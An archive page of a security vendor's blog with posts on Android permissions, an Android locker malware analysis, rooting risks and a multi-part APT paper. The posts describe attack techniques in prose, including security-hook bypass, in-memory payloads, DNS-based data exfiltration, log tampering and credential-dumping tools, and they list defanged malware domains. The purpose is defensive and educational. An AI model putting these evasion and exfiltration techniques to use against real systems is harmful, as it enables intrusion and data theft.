These are quick first looks and trend and threats


Read More >>
Written by the security and AV professionals from team K7, meant for the general audience
Read More >>
These are usually articles that go into internals of a virus or deal with security issues
Read More >>
Senior managers speak on areas of interest to them, inside and outside the industry
Read More >>

Archive for the ‘Security’ Category

Pick the Permissions; Android Marshmallow

Wednesday, September 2nd, 2015

This blog intends to inform the general public about some of the feature enhancements in the next version of Android (6.0), labelled “Android Marshmallow” focussing on the significance of the permissions list of an application.

Last week Google announced its next version of Android, Android 6.0 nicknamed “Marshmallow”. Though the final release date of Marshmallow is not yet confirmed, here are some of the interesting features included in Marshmallow, by no means an exhaustive list:

  • Android Pay

With this feature users can enter their credit card details and Google will create a virtual account to enable an easy checkout process using the NFC system.

  • Application linking

As of now when a user clicks on a link, a dialog box pops up prompting the user to select one of the available applications like Chrome or another suitable browser application to render the link. With Android Marshmallow, the Android OS verifies the link with the respective application server (provided the corresponding app is installed) and post authentication, with the help of an auto-verify feature (application developers can code an auto-verify feature in their application) the link is opened within the application.

  • Unlock feature

Fingerprint scanner support.

  • Power

Though not security-related it is interesting to know that “Doze Mode” is incorporated to improve the device’s standby time. Using motion detectors, Android will identify if the device is idle or in use. If the device is found idle, Android kills the background processes to improve the battery life.

  • App permissions

Yes! Now I can choose what an application should be allowed to do in real time!. Traditionally, Android applications request the user for their required resource-access permissions at install time. These permissions cannot be modified post installation. With Android Marshmallow, users can choose to allow or deny a specific permission from the permission list of an Android application whilst the application is active. The description of this feature claims that the applications will request for the required permissions the first time the application’s feature is invoked, instead of requesting all the permissions in one go at installation time. As many of Android malware disguise themselves as legitimate applications or are bundled with other legitimate applications, restricting an application based on the permissions (which in turn restricts the app’s functionality) would help increase the security of the user’s device and personal data.

However, users-awareness about the importance of the permissions granted and the functionality of an application is still essential. As we discussed in our previous blog, a taxi-booking application does not typically need permission to access the files in the device’s SD card to perform its functionality. Similarly, a gaming application does not require permission to access contacts information for it to operate. One should be aware about the permissions that should be granted or denied to avail of the application’s actual functionality.

In addition, for Android Marshmallow, if the same permission restrictions hold good for a legitimate security application as well, there is a possibility that a malware with super-user access could modify the granted permissions list of the security application. As suggested by us in our VB2014 paper, updating the Android OS framework such that trusted security applications are loaded earlier than any other application installed could help handling these situations.

Image courtesy:
Androidpit.com

V.Dhanalakshmi
Senior Threat Researcher, K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed/

Social Networking Abuse – Potent Threat

Thursday, August 20th, 2015

This blog intends to highlight some of the dangers faced by the general public associated with an ever expanding use of social networking sites, all set to grow at an even greater rate post the launch of government initiatives such as the Digital India campaign.

Social networking sites such as Twitter and Facebook provide an efficient interface for communication with multiple people in a user-friendly manner. People are connected to their friends, family and followers in real-time, on-the-go using mobile devices. The ugly side to this increasing use of social networking sites is the potential for controlled, targeted abuse within a very short space of time. Recently the Hindu newspaper reported the abuse of Twitter in the recruitment programme of banned organisations.

Users of social networking sites do not appear to think twice about sharing large amounts of their private Personally Identifiable Information (PII) online. This freely available PII, which includes date of birth, phone number, address, and so on allows malevolent actors to hone their attacks’ penetrative function. In addition, given the speed of transmission, it is possible for attackers to reach a large number of victims very quickly, potentially triggering a mass panic scenario, or spreading malware, or increasing recruitment for banned organisations, etc.

There is at least one documented case of the use of social networks to trigger mass panic in India through the use of doctored images and targeted, threatening messages. In August 2012 thousands of Indians from some North-Eastern states of the nation were made to feel threatened to the extent that they decided to flee in large numbers to their home states from other parts of the country; a grave situation indeed.

The above real-world example provides a stark reminder about the havoc that can be caused when malicious content goes viral, either intentionally or otherwise. Legislation related to IT in many countries provides for monitoring of online content, inclusive of social networking sites, especially given that national security could well be at stake. In the documented case mentioned above, the attack vectors were neutered and some semblance of normality restored only after the offending sites were temporarily blocked and bulk SMS/MMS were banned for a short time as per the provisions in law.

Some images (adapted to suit the article) are courtesy of several sites.

Samir Mody
Senior Manager, K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed

Gone in 60 Seconds: Is the Internet Becoming Volatile?

Friday, August 14th, 2015

This blog intends to inform the general public about the impact on the Internet of an increase in the prevalence of self-destructing messaging services.

Almost everyone of us is so happy with more than one genie at hand; as we own a smartphone, tablet, laptop, etc … and a click of a button or a screen-touch can satisfy our cravings from food to knowledge. Also the communication world is never running short of new stuff popping up now and then with tweets, pokes, chats, likes, posts and so on.

Don’t we enjoy a twist in the movies we watch? One has to wonder if the Internet is the next ‘anterograde amnesia’ victim, where an unforeseen whirl takes over social networking services silently.

On one hand, Hadoop technology is booming to handle the exponential growth of data, and spiders are crawling over the internet to feed search engines. But there is a potential balance created by self-destructing communication methods important enough to discuss, as the number of apps and services providing this functionality are increasing with more number of users everyday. In addition the social networking giants’ competing feature is shifting focus from providing nearly unlimited storage space to providing an expiry time on demand. A silent balance is inching toward creating major chunks of the lost internet.

When communicating confidential information over the internet, there is a jolt in us. We think several times, whether we can trust the internet and its services. And for one reason or another, we compromise ourselves with the communication services we get online.

Now, the privacy jolt is taking a noticeable turn because it seems to give more power to the users like data wiping, evidence shredding, and “suicidal messages”. It is not strange for us to regret sending a wrong file or a message to an unintended recipient, for liking a wrong post or comment by mistake too. But it is also important to note that these auto-timed or customisable self-expiring messages are redefining secretive communication.

This trend seems to cure the privacy fever of social media with email bombs, ephemeral messages, auto-expiring tweets, timed chats, self-deleting pokes and much more; from its suffering to hold itself together with features like ‘recall’ or ‘undo’ a sent email, off the record chats, etc.

Such self-destructing email services promise to destroy their path traversed over the servers and the email itself in a prescribed amount of time. These promises are not new to us as we have been relying for years on strong encryption and secure channels.

There is always more than one solution to a problem. Few apps use temporary hyperlinks. Some provide a one-time password to access the timed webpage. The passwords and the websites are not available after the expiry time. Some store the contents temporarily in servers until the message is delivered to all the intended recipients and delete the contents from the servers and from the recipient’s inbox once the message is read. Some use external apps and browser extensions too.

Some apps face issues like screenshots being taken, accessed via different modes instead of viewing the content via the app, and message ID vulnerability hacks on related sites too. Some apps have already fallen victims to cyber forensic studies as they save the images and videos in hidden folders or rename the files to unknown file extensions; because researchers are ready to spend a number of hours and thousands of dollars for their research. But competitors release newer products with upgraded versions which offer more sophisticated artificially-intelligent communication systems.

Cyber criminals use such service widely to communicate their secrets or threaten victims. Of course anyone can use this service for having a legitimate conversation as well. One need not forget self-expiring attachments are also joining hands with this feature which prevents the messages from being copied, forwarded, edited, printed, or saved.

With competitors focusing on providing the self-destruction feature, the following questions certainly arise:

  • Will the internet become erasable?
  • Will social networking become the most secret communication method going forward?
  • Did we just discover invisible data or communication?
  • Will these mortal messages force cybercrime lexicology to accept its demise?
  • Will the expansion of SMS be changed to Short-lived Messaging Service?
  • Will the cyber crime investigators exclaim: “Eureka! But where did the evidence go?”?

Looks like we just have to wait and watch what surprises the future brings.

Images courtesy of:
cdn-media-1.lifehack.org/wp-content/files/2014/04/7557deec.jpg
blog.ericgoldman.org/wp-content/uploads/2014/08/shutterstock_167170781.jpg

Ayesha Shameena P
Threat Researcher, K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed/

Patch Released, Before You Can Say ‘Patch Tuesday’

Friday, July 10th, 2015

Microsoft is set to do away with its cycle of serving up security updates, released on the second Tuesday of every month. This is (un)officially known as ‘Patch Tuesday’ in tech circles.

In an earlier blog post, we had mentioned that Microsoft is doing all it can to beef up on their security front. Along the same lines, this is also a move to ensure that any security update, critical or not, will reach a Windows 10 user immediately and will no longer have to wait for a month.

Yes, updates will be rolled out 24/7 year round for all devices that run Windows 10, thereby potentially reducing the time taken to address a security issue once it is found. These releases are not restricted to security updates alone, but any software enhancements would also follow the same pattern.  A round-the-clock approach updating the OS infrastructure could also improve the quality of the updates; in the past there have been issues with unstable patches.

While the month-on-month cycle is going to remain for Business and Professional users, Microsoft has reworked this under the title Windows Update for Business. This would provide features to prioritize patching based on chosen devices, to specify timeframes during which updates should occur, and peer-to-peer delivery of the updates for bandwidth conservation in an environment of a large number of computers.

This expedited update schedule is primarily aimed at securing devices ASAP once a security lapse has been identified and fixed.  Though Microsoft claims that users will be provided free lifetime upgrades, the timeframe might in fact be tied down to the type of device that the OS is running on and the device’s supported lifetime.

Perhaps Microsoft is taking the timely patching of security lapses to an even higher level since many supposedly dead and dried malware (Conficker, etc.) that aren’t supposed to be spreading are still doing the rounds just because a patch hasn’t been applied. It is imperative that we as users take security, at least as seriously as Microsoft appears to be doing.

Image courtesy of:
keepcalm-o-matic.co.uk

Kaarthik R.M
K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed

My App or No App

Monday, June 1st, 2015

Last week in our K7 Threat Control Lab we came across an Android ransomware “locker” sample with a difference. This one splashes a lockscreen that recommends to the user a list of free applications to install in order to continue using any already installed application as shown below:

However, if the user chooses to install one or all of the listed applications, the list seems endless since a new application is inserted for the one that is chosen for installation. This implies that the user may not be able to access his already installed applications or it might take a long time to exhaust the displayed list to access them. Interestingly, the applications installed from the lock screen list are free to open and are not blocked by the splash screen.

Now let us see how this malware actually works.

Analysis of this locker shows that the AndroidManifest.xml file of the package has RECEIVERS (net.fatuously.Unengaged and net.fatuously.Encephalitis) registered to receive the broadcasts BOOT_COMPLETED, USER_PRESENT, SCREEN_ON, NEW_OUTGOING_CALL, PHONE_STATE and DEVICE_ADMIN_ENABLED respectively. But the registered RECEIVER classes are not referenced in the corresponding classes.dex.

click to enlarge

In addition when this locker sample is executed the application displays an additional custom explanatory message that is also not referenced in the top-level package, as shown in the picture below:

click to enlarge

Digging further it is understood that the APK under study carries within itself an encrypted (XORed) ZIP file (test.dat) in the assets folder which in turn carries the classes.dex file that is loaded at run time.

The studied APK file loads the classes.dex from the encrypted ZIP using the dynamic loading feature as shown in the java source below:

click to enlarge

The RECEIVERS registered in the top-level AndroidManifest.xml and the additional explanation in the Device Admin request screen are referenced in the dynamically loaded unzipped classes.dex file.

click to enlarge

click to enlarge

When the user tries to open any of the applications that is installed prior to the locker, the malware loads the splash screen by setting the splash screen content as the data to the intent “android.intent.action.VIEW” as seen in the following code:

This malware when run without an internet connection, or during application initialization, loads a different splash screen as shown below:

The corresponding code to load the above screen is:

And the contents of none.html are follows:

Base64 encoded data in this HTML contains the image (.PNG) content to be displayed.

A few of the websites to which this malware connects are:

sexualletube[dot]biz
pornigy[dot]biz
pornsage[dot]biz
adeffective[dot]org

Strangely the splash screen does not seem to demand any payment from the user. However, it proves to be malevolent as it does not allow the user to open any application that is installed earlier than the locker.

As we discussed in our VB2014 paper “Early launch Android malware: your phone is 0wned”, an updated boot and broadcast framework in the Android OS that allows the security products to load before any other application will help to keep these locker variants at bay. K7Mobile Security protects its users from this locker with the detection called “Trojan (004c2fc61).”

V.Dhanalakshmi, Senior Threat Researcher, K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed/

Rooting for Trouble

Friday, May 22nd, 2015


Despite device manufacturers’ announcement to the user about the void warranty on rooting Android phones, users still root their phones for various reasons such as installing special applications that runs only on a rooted device, removing built-in apps, USB tethering, turning the device into a Wi-Fi hotspot, etc., compromising on the features of security, performance and at the potential cost of the phone itself, as the user might fail at any step in the device-dependent process of rooting the device without a warranty safety net.

Apart from the traditional rooting methods, there are tools available online to root the device that can be run through either ADB or installed directly on the device.

One should also be aware that many Android malware require root access (administrative power) to execute the desired malefide functions on the victim’s device. They acquire root access by bundling with other good applications that require root access, by triggering an application in the victim device that requires root access, or by invoking exploits that they carry within themselves, as in the case of Android/DroidDream that carries the exploits RageAgainsttheCage and Exploid. In addition the recent Android PowerOffHijack malware exemplifies the ill-effects on the Android operating system if administrative power is acquired by a malware.

Security enhancements in Android notwithstanding, there are still new vulnerabilities and exploits for the OS being identified regularly. As per the recent Microsoft report that includes statistics on vulnerabilities and exploits reported in the second half of 2014, lots of the non-Windows exploits found on Windows computers are for the Android operating system and Open Handset Alliance.

All this implies that Android smartphone users should:

  • Ponder whether they really need to root the device
  • Be vigilant about the applications downloaded to root the device
  • Download the required application only from the official Google Playstore
  • Turn on the feature of “Verify apps” that is available with Android 4.2 or higher

Images courtesy of:
Talkandroid.com
Rootmyandroid.org
www.techlegends.in

V.Dhanalakshmi, Senior Threat Researcher, K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed/

Shell Team Six:Zero Day After-Party (Part VI)

Monday, April 27th, 2015

This is the final part of a six-part blog based on the paper submitted by my colleague Gregory and myself on Advanced Persistent Threats (APT), for AVAR 2014. Continuing from the fifth part of our paper…

Data Exfiltration and Cleanup



This stage of the APT involves the assailants collecting the sensitive data and transmitting it stealthily to a remote location. Data extraction can either be a one-time event or spread over a period of time, followed by constant snooping of the victim, all the while remaining hidden.

Once the objective of an APT campaign is achieved, the attackers exit the network in a phased manner after covering their tracks and clearing all the potential evidence of an intrusion.  The attackers could also plant or manipulate data in the target’s environment in an effort to create misdirection.

Extraction methodology

Confidential data that is collected during the period of the APT is copied to a staging server, compressed, encrypted and kept ready for transfer. Outbound sessions are then established that resemble legitimate traffic thereby attempting to fly under the security radar. The confidential data is thus extracted possibly in small chunks over a period of time.

The bad actors could exfiltrate data using any/all of the following methods:

HTTP/FTP/Cloud Storage Uploads

An HTTP/FTP upload or a cloud transfer is initiated by an application which is already approved by the firewall. Additionally, the packets could be SSL or custom encrypted making it difficult for security solutions to sniff.

Outgoing Emails with Password Protected Attachments

Sensitive contents are password protected and then transmitted using either a compromised employee’s email credentials, or by using a custom SMTP server.

Customized DNS Queries

Small chunks of data such as user credentials may be sent as custom DNS requests to DNS servers controlled by the attackers. The packets are then reassembled as required at the attackers end.

Fig.14. shows encrypted data sent as a DNS query

VPN/IPv6 Tunnels

VPN and IPv6 tunnels are created from the staging server to a remotely controlled machine. The contents are then securely transmitted through these tunnels.


The hacking outfit commonly known in computer security circles as Comment Crew [13] has been observed using the above data exfiltration techniques. Sensitive data which could potentially be Gigabytes in size would first be collected in a centralized location & compressed in a password-protected RAR file. The final archives would be split into chunks and uploaded using FTP, custom file transfer tools, etc.

Cleanup Methodology

The attackers tend to delete their malicious code and its associated components by remotely issuing self-destruct commands from their C2C server. A time/event bound kill switch built into the malicious code could also be automatically triggered to avoid being caught.

System logs that maintain login attempts, security logs that maintain protection status, audit files that track system changes, etc. are modified by the attackers to make a forensic reconstruction of the attack impossible.

Indicators of Compromise

Capturing and transmitting confidential data is the raison d’etre of any APT. In order to facilitate this transmission, the attacker must contact external servers from inside the victim’s network.

Here are some of the common symptoms that indicate suspicious activity within the organization’s network:

Wrong Data in the Wrong Place

Movement of encrypted or confidential data from a machine containing sensitive information to a potential upload server with Internet access, all within the organizations internal network could indicate that something is wrong.

Similarly, availability of large quantities of known-encrypted or sensitive data on a machine it’s not supposed be on could also indicate that something is amiss.

Anomalous Traffic


The following anomalies could indicate a compromise:

  1. Connections made directly to IP addresses
  2. HTTP/FTP connections on non-standard ports
  3. Connections to previously unused or high risk geo locations
  4. Accessing algorithmically generated domain names (DGA)

Other Indicators

Inconsistent events in audit logs maintained at network and endpoint level, changes in the system drivers list without an application uninstallation progress, etc. can also be used as indicators of compromise.

Prevention/Detection

Confidential information is the crown jewel of any company and typically it is this information that the attacker is focused on stealing. The following solutions can be involved in protecting the exfiltration of this confidential data:

Hardened DNS Servers


Outgoing DNS queries should be logged and monitored extensively for anomalies. Organizations could also create and maintain their own hardened DNS servers.

Security Solutions

Data aware technologies like Data Leakage Prevention (DLP) can be added to the organization’s existing layer of defense. Once critical and confidential data is identified, DLP solutions track and prevent this data from falling into the wrong hands.

URL scanners with built-in reputation intelligence can be used to detect:

  1. Access to subdomain/domains which are not popular or appear suspicious
  2. Repeated attempts to connect to domains which no longer resolve
  3. Attempts to connect to blacklisted or malicious IP addresses/domains
  4. Newly registered domains

Network scanners with Deep Packet Inspection and machine learning capabilities can be used to build a knowledge base of general network usage trends. Alarms are raised when deviations exceed pre-defined thresholds. This knowledge base includes:

  1. Commonly used protocols with source and destination information
  2. Common geo locations contacted
  3. Number of connections and the length of connections made depending on the time of the day

Software that take disk backups and dump physical memory images at regular intervals are of great help during incident response and forensic analysis of a potential APT attack.

Conclusion

The implications of the complexity and perseverance of Advanced Persistent Threats are of major significance to the existing security infrastructure. The evasion techniques discussed in this paper have exerted colossal pressure on the current methods used to detect and report these threats, especially where the human element is involved.

Safeguarding oneself against APTs requires more than just traditional security solutions. The need of the hour is a comprehensive, holistic security plan that intelligently integrates events reported from numerous forms of security established at various levels of the organization. This solution should be able to handle massive volumes of logs and spot patterns of an attack, find sources of a breach and stop new threats in their tracks.

Things are about to get a whole lot more difficult with compromised mobile devices joining the fray. Strategies to identify and stop sophisticated, multi-pronged APT attacks have been discussed; however coordinated implementation is far from straightforward. We live in interesting times.

References:

[13] http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf

Lokesh Kumar
K7 Threat Control Lab

If you wish to subscribe to our blog, please add the URL provided below to your blog reader:
http://blog.k7computing.com/feed/

Shell Team Six:Zero Day After-Party (Part V)

Friday, April 10th, 2015

This is the fifth part of a six-part blog based on the paper submitted by my colleague Gregory and myself on Advanced Persistent Threats (APT), for AVAR 2014.

Continuing from the fourth part of our paper

Expanding Access and Strengthening Foothold

The device that falls first is usually not the primary target of the APT. This backdoored computer is instead used as a base to search and compromise more devices that likely contain credentials to other workstations, application servers, etc. The assailants move laterally within the network, gaining access to these machines, strengthening their foothold, all the while hunting for valuable target information which was the objective of the attack.

Expansion Methodology

The initial infected host connects back to a command and control (C2C) infrastructure controlled by the bad actors. It sends critical information such as password details, privileges of the currently logged user, mapped drive information, etc. and awaits further instructions. The following techniques are used by the attackers to expand their access:

Privilege Escalation

The attackers exploit privilege escalation vulnerabilities to escape the confines of a limited user’s account. The objective here is to gain “root” on the infected machine which enables them to perform tasks that require elevated privileges such as creating/deleting system services, accessing critical process’ memory space, mapping internal networks, etc.

Fig.13: Privilege escalation code used from the Council for Foreign Relations Watering Hole attack

Remote Exploitation

Malware components can exploit network vulnerabilities to compromise systems accessible in the local network. The Stuxnet malware exploited a 0day Print Spooler (CVE-2010-2729) remote code execution vulnerability to propagate itself into new machines.

Installing More Tools

During the initial compromise, the malware authors use custom zero-day code that exploits vulnerabilities in common applications. In the expansion stage of the APT though, to avoid having to re-write code, the bad actors tend to use standard tools.

These tools could include system utilities like PsExec [9], network packet sniffers like tcpdump [10], password extracting tools like gsecdump [11], Cain&Abel [12], etc.

Obtain Credentials

With the help of the tools installed, the attackers brute-force login credentials to workstations and servers that likely contain sensitive data.

They could establish remote desktop sessions to these machines and eventually make their way onto domain controllers that have unrestricted access to the entire network.  They then begin their hunt for the target data to be extracted, if they haven’t found it already, that is.

Indicators of Compromise

Once the assailants possess domain level credentials, their movement within the network resembles that of legitimate traffic and so becomes very difficult to track. The following behaviors on the other hand could indicate a compromise and are relatively easy to track:

Presence of Unwarranted Files

Unauthorized use of kernel modules to elevate ones privileges could imply a compromise. The presence of unapproved software, modified versions of existing drivers containing trojanized code, tools like port scanners, password crackers, network sniffers, etc. could also indicate a compromise.

Login Irregularities

Repeated failed login attempts using non-existent user accounts, successful login attempts to machines that deviate from established baseline logins, login activity at odd hours, etc. could mean something is amiss.

Anomalies in Security Settings

Unauthorized disabling of security software, tampering of exclusion lists in firewalls and Anti-Virus, even for a brief period of time, could indicate a compromise.

Anomalies in User Account Activity

Changes in behavior of a user account such as time of activity, type of information accessed, systems accessed, etc. could indicate a compromise.

Prevention/Detection

Along with multi-factor authentication for sensitive accounts, updated Anti-Virus software that detects unwanted tools, a strong password policy, etc. the following solutions can be implemented to augment the network’s security:

Unified Extensible Firmware Interface (UEFI) and Secure-Boot

Privilege escalation attempts can be significantly reduced by using UEFI/secure-boot enabled machines that provide a level of trust from boot-up time.

Early Launch Anti-Malware (ELAM)

Security solutions with early loading components that are capable of detecting and blocking unauthorized kernel code should be installed throughout the network.

Click here to read the final part of this blog

References:

[9] http://technet.microsoft.com/en-us/sysinternals/bb897553
[10] http://www.tcpdump.org
[11] http://www.truesec.com/Tools/Tool/gsecdump_v2.0b5
[12] http://www.oxid.it/cain.html

Lokesh Kumar
K7 Threat Control Lab

If you wish to subscribe to our blog, please add the URL provided below to your blog reader:

http://blog.k7computing.com/feed/

Surge in Unauthorized Access Grabbing

Monday, March 30th, 2015

Authorization, an access control system, is all about administering and providing sensitive system access to a process or an application or a class of users based on their privilege level. Privacy and security concerns arise when system resources are accessed by an unauthorized process, application, or user.

Application and system developers always strive to incorporate secure authorization systems in their software. On the other hand, hackers come forth with new exploit techniques to elevate the access privilege associated with a specific process, system, or user. Many of the attacks start with an entry into the targeted systems with limited privileges and then an attempt to elevate privileges by exploiting a vulnerability in the OS itself or in third-party installations.

We conducted a short piece of research work on Elevation of Privilege (EoP) vulnerabilities using publicly available information on vulnerabilities discovered in operating systems, desktop applications and browsers. Interestingly the data indicates a significant rise in EoP vulnerabilities over the past two–and-half years.

From our research set on Microsoft Windows operating system vulnerabilities found over the time period mentioned earlier, we found that out of 700 vulnerabilities, 115 vulnerabilities were Privilege Escalation vulnerabilities, i.e. approximately 16%. It is clear from the research data set that attackers or malware writers are focusing more on EoP vulnerabilities to carry out their malicious attack as silently as possible.

Standalone exploitation of EoP vulnerability might not be sufficient for the attacker to achieve the required destructive behavior thus forcing the attacker to look for yet more vulnerability in the system to exploit.

The following is a list of commonly exploited Windows components:

The Group Policy Service
Windows kernel-mode driver (Win32k.sys)
Cryptography Next Generation kernel-mode driver (cng.sys)
WebDAV kernel-mode driver (mrxdav.sys)
TS WebProxy Windows component
Windows User Profile Service (ProfSvc)
Microsoft IME
TypeFilterLevel Checks
Windows audio service component
Windows TCP/IP stack (tcpip.sys, tcpip6.sys)
Kerberos KDC
FASTFAT system driver, FAT32 disk partitions
Message Queuing service
.NET Framework
Windows Task Scheduler
Windows Installer service
DirectShow
Ancillary Function Driver
On-Screen Keyboard
ShellExecute API
TypeFilterLevel checks
Group Policy preferences
NDProxy component
Local Remote Procedure Call
Windows audio port-class driver (portcls.sys)
Hyper-V
USB drivers
Windows App Container
DirectX graphics kernel subsystem (dxgkrnl.sys)
Service Control Manager (SCM)
NT Virtual DOS Machine (Ntvdm.exe)
asynchronous RPC requests handling (Rpcss.dll)
TrueType font files handling
Windows Print Spooler (Win32spl.dl)
NTFS kernel-mode driver (ntfs.sys)
Windows CSRSS (cmd.exe)
Remote Desktop ActiveX control (mstscax.dll)
Windows USB drivers

We see that the attackers often aim at a relatively highly destructive attack by exploiting privilege escalation and code execution vulnerabilities together.

Techniques employed by malware writer constantly evolve to achieve the desired privilege escalation undetected. There are many privilege elevation techniques publicly available online, such as:

  1. METHOD OF PROVIDING A COMPUTER USER WITH HIGH LEVEL PRIVILEGES, PATENT 7,945,947
  2. Exploiting The Known Failure Mechanism in DDR3 Memory referred to as Row Hammer to gain kernel privilege with the only “patch” being a replacement of the DRAM!

Sometimes it is simply not possible to patch a vulnerability.

Elevation of Privilege is not limited only to operating systems but is also witnessed in desktop applications, browsers, web applications and even in hardware. With the increasing popularity of Internet of Things across devices everywhere, the effect of exploiting an  Elevation of Privilege vulnerability in just one of the links in Internet of Things could give the attacker complete control of the whole system.

Image courtesy of:

tompattersontalks.blogspot.in

Priyal Viroja, Vulnerability Researcher, K7TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader: http://blog.k7computing.com/feed/

Shell Team Six:Zero Day After-Party (Part IV)

Friday, March 13th, 2015

This is the fourth part of a six-part blog based on the paper submitted by my colleague Gregory and myself on Advanced Persistent Threats (APT), for AVAR 2014.

Continuing from the third part of our paper…

Security Solutions Bypass

The next layer of defense that an attacker confronts is the end point security provided by third party vendors. Host Intrusion Prevention Systems (HIPS) for example, detect ROP exploitation and prevent shell code execution by injecting their modules into commonly exploited applications and placing hooks at various operating system APIs. However, these inline hooks meant to monitor suspicious activities and detect exploitation attempts are placed under the same privilege as the rest of the code in the process, thereby undermining the security solution’s ability to maintain and intercept all the required APIs.

Hook Hopping

This technique involves the attackers executing standard function prologues of intercepted APIs within self and then transferring control just past the JMP instruction intended to intercept the call.

Fig.10: Control flow depicting bypass of JMP instruction in a hooked API

The DeputyDog campaign [6] which exploited the CVE-2013-0389 vulnerability, employed the above technique to bypass the interception of WinExec() API calls by security software.

Direct SYS Calls

These are a sequence of CPU instructions that transfer control to the kernel directly from the application code instead of using the OS provided user mode APIs.

Payload Delivery via Documents or Sparse Encrypted Fetches

Shell code used as part of the exploitation chain may need to execute a larger payload to establish a backdoor on the machine. To prevent this payload from being detected by security scanners, the attackers can:

  • Embed the payload in popular document formats like PDF, DOC, etc. The shell code when run, locates this payload in the document by scanning for specific magic markers, extracts it and executes it, or
  • Download smaller encrypted chunks of the larger payload stealthily onto the victim’s machine. These chunks are later reassembled and executed on the victim’s machine.

Anti-Virus Bypassing

The attackers use custom cryptors to encrypt their malicious code and attempt to defeat traditional signature based Anti-Virus scanners. At times, these files are digitally signed using trusted stolen certificates to appear legitimate and to circumvent local system policies.

The notorious Stuxnet malware for instance used malicious kernel drivers signed with valid stolen digital certificates to bypass Anti-Virus scanners.

Equipped with information about the security solutions installed in the organization’s end point, these payloads are often tested for detection by the vendor’s security scanner before they are deployed onto the victim’s machine.

Volatile Threats

The attackers execute their malicious payloads directly on the victim’s machine without ever writing the file on the machine’s disk. Traditional security solutions that scan only files on the disk in real-time cannot see these malicious payloads that are directly written and executed in memory. Behavioral analysis systems do not intercept these operations either fearing additional performance overheads.

In the BaneChant APT campaign [7], the shell code downloaded an innocuous XOR encoded binary as the first level payload. This binary in turn downloaded a second level payload which was an executable impersonating an image file meant to bypass security scanners. Once downloaded, this binary was executed directly in memory.

Indicators of Compromise

The initial compromise stage of an APT represents an attacker’s attempts to gain entry into the target organization’s network.  In an environment defended by multiple layers of logging and security, it becomes quite a challenge for an attacker to be successful without leaving behind digital footprints. Provided below are some symptoms that could indicate a compromise in an organization’s network:

Suspicious System Changes

The presence of unauthorized applications that start from uncommon auto-start locations could indicate a compromise. Files names that resemble popular/operating system files like svchost.exe, acrord32.exe, etc. and dwell in unusual locations should also raise suspicion levels.

Fig.11: System file name present in an unusual auto-startup location

Hidden instances of popular applications like Internet Explorer, code-injection attempts into trusted operating system related processes, installation of unauthorized software, loading of driver files without an entry in the Service Control Manager, etc. could also indicate compromise.

Unusual Disk Activity

Exploitation attempts using heap spray techniques tend to use significant amounts of memory.

At times this can lead to high disk activity due to frequent page-file access. Attempts to sweep a user’s profile area for personal or confidential data could also result in increased disk activity, which could indicate compromise.

Compromised Security Components

Partially enabled security features or completely disabled security solutions on endpoints, even for a brief period of time, could indicate that something is wrong.

Loading of Unsigned Drivers in x64 Systems

x64-based Microsoft Windows verifies and allows only digitally signed driver binaries to load during system boot-up. Unsigned malware that want to load early on during the boot process will have to disable this verification process.

Boot kits for instance, tend to bypass the driver signing policy by making persistent system wide changes. Successful loading of a custom unsigned “test” driver on a machine infected with such a boot kit could indicate a compromise.

Fig.12: Windows alerting on loading an unsigned driver

Prevention/Detection

Mock Phishes

Since human behaviour is manipulated to the attacker’s advantage during this stage of an APT, training programs should be conducted at regular intervals to educate the users on the latest intrusion techniques. These programs should aim at explaining the importance of security along with adequate examples, as well as changing user behaviour such that they follow security policies correctly.

Pen test emails mimicking a spear phishing attack could be used to improve the employees’ resilience towards such attacks [8].

Virtualization

Email applications and web browsers could be run in a virtualized environment that is automatically reverted during startup.


Malicious email attachments and drive by downloads would be contained within this environment and reboot resilient code would not survive a revert-to-clean-snapshot assuming that the malware cannot escape the guest VM and infect the host.

Intent to View

Suspicious or unknown email attachments should explicitly be stripped by security solutions.

These attachments should be released to a user only if he/she explicitly requests them.

Detecting Bypassing Attempts

Evasion techniques such as hook-hopping can be identified by breaking some basic assumptions made by the attacker. The security solution can replace the random number of instructions from the function prologue with its own code sequence. This way, shell code that attempts to bypass the initial JMP instruction would still land on the code sequence controlled by the security solution.

Few security solutions use multiple int 0×3 instructions past the initial JMP instruction to trigger a debug exception when executed, breaking the flow of execution.

Hook bypass attempts using direct system calls from user-mode processes can be flagged using a kernel module, if this user-mode to kernel-mode transition does not originate from the native layer.

Click here to read the fifth part of this blog

References:

[6] http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-part-2-zero-day-exploit-analysis-cve-2013-3893.html
[7] http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
[8] http://phishme.com/product-services/what-is-phishme

Lokesh Kumar
K7 Threat Control Lab

If you wish to subscribe to our blog, please add the URL provided below to your blog reader:
http://blog.k7computing.com/feed/